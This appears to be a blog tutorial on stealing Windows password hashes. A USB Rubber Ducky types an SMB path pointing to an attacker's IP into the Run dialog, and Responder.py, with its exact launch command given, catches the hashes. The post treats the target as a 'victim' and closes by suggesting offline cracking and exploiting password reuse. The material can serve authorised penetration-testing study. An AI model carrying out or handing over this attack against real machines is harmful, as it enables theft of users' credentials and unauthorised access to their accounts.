SMBUSB Rubber Ducky

Capturing Windows Hashes – USB Rubber Ducky

Capturing Hashes – Introduction

I spotted a tweet earlier this week from the Hak5 crew, makers of the USB Rubber Ducky. The tweet was based around capturing Windows hashes with a payload that sends a SMB request from the victim machine to your attack machine.

You can read Hak5’s original post about the topic here:

https://hakshop.com/blogs/news/whats-the-quickest-way-to-steal-a-windows-password-hash

Requirements

To get this working successfully, you will need the following:

  1. USB Rubber Ducky
  2. Generated Payload
  3. A server running Responder.py waiting to capture the hashes from the SMB request

Generating the Payload

Payload

Hak5 have a publicly available payload generator (Duck Toolkit), which produces a .bat file containing the malicious payload. It’s nice and easy, paste your payload into the generator, click ‘Generate Script’ and then select the file you wish to use (Inject.bin).

 

In the screenshot above, you can see how simple the payload really is.

REM = Remarks (Notes/Instructions from the author)
DELAY = Time to delay (1000 - 1 second)
GUI r = Windows run GUI
DELAY 100 = Delay 100ms
STRING = The text entered into the Windows run GUI - \\<ATTACK IP ADDRESS>
ENTER = OK

Place the .bin file onto the micro SD card and get ready to fire it up! But before you do, remember to start responder.py…

Server Running Responder.py

I personally have a cloud hosted server for testing (Ubuntu). Firstly you have to git clone responder.py and then run responder.py as root

sudo python responder.py -I eth0 -fvw

Now Responder is listening, waiting for them sweet, sweet hashes 😀

When you plug the Rubber Ducky USB in the victim’s machine it runs the payload within two seconds, which will look like this:

If they have allowed TCP:445 outbound, you will start to capture the victim’s log in credentials and password hash.

Victim’ Username and hash

You’re now ready to crack the hash offline! What are the chance the user has the same password for other accounts? Hmmmm!

There’s more mentioned on cracking hashes in one of my other posts – http://178.62.123.49/wifi-hacking/